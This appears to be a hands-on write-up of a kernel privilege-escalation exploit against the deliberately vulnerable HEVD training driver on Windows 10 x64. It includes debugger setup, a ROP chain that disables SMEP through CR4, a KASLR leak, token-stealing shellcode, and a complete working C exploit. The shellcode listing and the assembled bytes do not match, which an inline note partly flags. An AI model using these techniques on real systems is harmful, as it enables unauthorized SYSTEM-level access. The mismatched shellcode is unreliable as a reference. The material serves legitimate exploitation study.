Windows 10 x64 Kernel Exploitation - Stack Buffer Overflow using HEVD
Setup
This has been repeated 100 times, so I'm keeping it brief. The debuggee and debugger are Windows 10 x64 fully up to date (OS Build 19045.5371). I used the following commands to set up the debuggee virtual machine (the final sc stop and sc delete commands are only needed to remove the driver afterwards). On the debugger VM, I installed WinDbg, Visual Studio, and Binary Ninja.
REM Allow test-signed drivers to load and enable kernel debugging over the network.
bcdedit -set TESTSIGNING on
bcdedit /debug on
bcdedit /dbgsettings net hostip:<HOST IP ADDR HERE> port:50000
REM Register HEVD as a kernel-mode service, start it automatically, and check its state.
sc create HEVD binPath= C:\driver\vulnerable\x64\HEVD.sys type= kernel
sc config HEVD start= auto
sc start HEVD
sc query HEVD
REM Cleanup only: stop and remove the service when finished.
sc stop HEVD
sc delete HEVD
Trigger the Exploit and Gain RIP Control
I triggered the buffer overflow with a cyclic pattern to easily identify the offset for RIP
control.
int main(void) {
HANDLE hDriver = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
char payload[] = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3....De8De9Df0Df1Df2D"
DeviceIoControl(
hDriver,
HEVD_IOCTL_BUFFER_OVERFLOW_STACK,
payload,
sizeof(payload),
NULL,
0,
NULL,
NULL);
return 0;
}
After the crash, we can use WinDbg to inspect the stack (dq rsp
), and find the value we tried to ret
to. Then look up that value in the pattern to find the offset for rip
control.
Time to ROP
Because of DEP and SMEP, our only option is to ROP (although I believe CET/shadow stacks, if enabled and supported by the kernel, would stop ROP).
DEP - The easiest solution is to allocate an executable page in userland for our shellcode.
SMEP - Disable SMEP by clearing bit 20 of the CR4 register. CR4 is a per-processor register, so this disables SMEP on the processor that runs the ROP chain and lets us execute userland pages from the kernel. (Note that with Virtualization-Based Security (VBS), CR4 would be protected.)
I used https://github.com/Ben-Lichtman/ropr to find some gadgets to disable SMEP by modifying the CR4 register. Note the addresses given by ropr (and tools like Binary Ninja) include the 0x140000000 image base which needs to be subtracted.
// Gadget addresses: ntoskrnl.exe load address plus an image-relative offset.
// NOTE(review): the offsets presumably only hold for the OS build used in this write-up - re-derive them for any other build.
u64 POP_RCX = kernelBase + 0x9b2952; // pop rcx; ret;
u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;
Also note, you cannot pick gadgets within any sections of the PE file marked as DISCARDABLE. These sections will be scrambled after initialization is complete.
Also note I hardcoded a value to write into cr4
. It would be more ideal to read it first, but I couldn't find any gadgets to do this ☹. Regardless, the best approach is to flip the Owner
bit in the PTE as this bypass works with VBS enabled. See https://wetw0rk.github.io/posts/0x04-writing-what-where-in-the-kernel/#windows-11-x64 for a good example.
Because these gadgets are within the kernel (C:\Windows\System32\ntoskrnl.exe), we need to break KASLR. Luckily, we are on Windows 10 running at medium integrity, and there are many Win32 APIs to do so. On Windows 11 24H2 this requires a kernel memory leak.
// Returns the load address of the first driver reported by EnumDeviceDrivers,
// which this write-up uses as the ntoskrnl.exe base, or NULL when the
// enumeration fails or reports no entries.
PVOID GetKernelBaseAddress(void) {
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded = 0;

    // EnumDeviceDrivers returns zero on failure; do not trust the array then.
    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) {
        return NULL;
    }

    // Fewer bytes than one pointer means no entry was written.
    if (cbNeeded < sizeof(drivers[0])) {
        return NULL;
    }

    return drivers[0];
}
The kernel base address can be confirmed by running lm sm *nt*
in WinDbg.
The new code is:
int main(void) {
u8 token_steal[256] = { 0x90 }; // NOPs
u64 kernelBase = (u64)GetKernelBaseAddress();
u64 POP_RCX = kernelBase + 0x9b2952; // pop rcx; ret;
u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;
HANDLE hDriver = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver", // lpFileName
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
const u64 offset = 2072;
const u64 payloadSize = 2500;
const u64 shellcodeSize = 4096;
LPVOID payload = VirtualAlloc(NULL, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
LPVOID shellcode = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memset(payload, '\x41', payloadSize);
memcpy(shellcode, token_steal, sizeof(token_steal));
u64* rop = (u64*)((u64)payload + offset);
u64 index = 0;
*(rop + index++) = POP_RCX;
*(rop + index++) = 0xb50ef8 ^ 1UL << 20; // hardcoded value of CR4
*(rop + index++) = MOV_CR4_RCX;
*(rop + index++) = (u64)shellcode;
DeviceIoControl(
hDriver,
HEVD_IOCTL_BUFFER_OVERFLOW_STACK,
payload,
(DWORD)payloadSize,
NULL,
0,
NULL,
NULL);
return 0;
}
Running this, we see the ROP chain execute, disable SMEP, and ret
into the shellcode which is currently just NOPs.
Token Stealing Shellcode
I stole all this from https://vuln.dev/windows-kernel-exploitation-hevd-x64-stackoverflow/ but double-checked the offsets in WinDbg. It's a token-stealing shellcode combined with a generic way to return from the DeviceIoControl
syscall without crashing. This was assembled using NASM.
[BITS 64]
; Token-stealing payload: starting from the current process, follows the
; process list until it reaches PID 4 (SYSTEM) and copies that process's token
; into the current process. Structure offsets are the ones used in this
; write-up for its OS build.
start:
    mov rax, [gs:0x188]       ; KPRCB.CurrentThread (_KTHREAD)
    mov rax, [rax + 0xb8]     ; APCState.Process (current _EPROCESS)
                              ; dt nt!_KTHREAD ApcStateFill + dt nt!_KAPC_STATE Process
    mov r8, rax               ; R8 = list cursor; RAX keeps the current _EPROCESS ptr
find_system:                  ; renamed from "loop", which is also an instruction mnemonic
    mov r8, [r8 + 0x448]      ; ActiveProcessLinks (dt _EPROCESS ActiveProcessLinks)
    sub r8, 0x448             ; Go back to start of _EPROCESS (same offset as above)
    mov r9, [r8 + 0x440]      ; UniqueProcessId (PID) (dt _EPROCESS UniqueProcessId)
    cmp r9, 4                 ; SYSTEM PID?
    jnz find_system           ; Loop until PID == 4
replace:
    mov r9, [r8 + 0x4b8]      ; Get SYSTEM token (dt _EPROCESS Token)
    and r9b, 0xf0             ; Clear low 4 bits of _EX_FAST_REF structure.
                              ; Only the low byte is masked: "and r9, 0xf0" would
                              ; also zero every bit above bit 7 of the pointer.
    mov [rax + 0x4b8], r9     ; Copy SYSTEM token to current process (dt _EPROCESS Token)
    xor rax, rax
    ; NOTE(review): the assembled byte array in the full exploit does not end
    ; in a plain ret; its final bytes are swapgs (0f 01 f8) and sysretq
    ; (48 0f 07). This listing appears to omit that return sequence - confirm
    ; which version was actually assembled.
    ret
The full exploit code
#include <Windows.h>
#include <Psapi.h>
#include <stdio.h>
// Short aliases for the integer types used throughout, grouped by width.
// Each pair is the signed alias followed by its unsigned counterpart.
typedef signed char i8;
typedef unsigned char u8;

typedef short i16;
typedef unsigned short u16;

typedef int i32;
typedef unsigned int u32;

typedef long long i64;
typedef unsigned long long u64;
// Number of elements in a true array (not a pointer). The argument is
// parenthesized so that cast or dereference expressions are measured as a
// whole instead of having [0] bind to only part of them.
#define ArraySize(x) (sizeof(x) / sizeof((x)[0]))
// Builds a METHOD_NEITHER, FILE_ANY_ACCESS control code on FILE_DEVICE_UNKNOWN
// for the given function number.
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function), METHOD_NEITHER, FILE_ANY_ACCESS)
// Control code this exploit sends to reach the stack buffer overflow handler.
#define HEVD_IOCTL_BUFFER_OVERFLOW_STACK IOCTL(0x800)
// Returns the load address of the first driver reported by EnumDeviceDrivers,
// which this write-up uses as the ntoskrnl.exe base, or NULL when the
// enumeration fails or reports no entries.
PVOID GetKernelBaseAddress(void) {
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded = 0;

    // EnumDeviceDrivers returns zero on failure; do not trust the array then.
    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) {
        return NULL;
    }

    // Fewer bytes than one pointer means no entry was written.
    if (cbNeeded < sizeof(drivers[0])) {
        return NULL;
    }

    return drivers[0];
}
int main(void) {
u8 token_steal[] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04,
0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b,
0x88, 0xb8, 0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89,
0x88, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00,
0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01,
0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 0x07 };
u64 kernelBase = (u64)GetKernelBaseAddress();
if (kernelBase == 0x00) return 1;
const u64 POP_RCX = kernelBase + 0x9b2952; // pop rcx; ret;
const u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;
HANDLE hDriver = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hDriver == INVALID_HANDLE_VALUE) return 1;
const u64 offset = 2072;
const u64 payloadSize = 2500;
const u64 shellcodeSize = 4096;
LPVOID payload = VirtualAlloc(NULL, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
LPVOID shellcode = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!payload || !shellcode) return 1;
memset(payload, '\x41', payloadSize);
memcpy(shellcode, token_steal, sizeof(token_steal));
u64* rop = (u64*)((u64)payload + offset);
//*(u64*)((u64)payload + offset) = (u64)shellcode;
u64 index = 0;
*(rop + index++) = POP_RCX;
*(rop + index++) = 0xb50ef8 ^ 1UL << 20;
*(rop + index++) = MOV_CR4_RCX;
*(rop + index++) = (u64)shellcode;
DeviceIoControl(
hDriver,
HEVD_IOCTL_BUFFER_OVERFLOW_STACK,
payload,
(DWORD)payloadSize,
NULL,
0,
NULL,
NULL);
system("cmd");
return 0;
}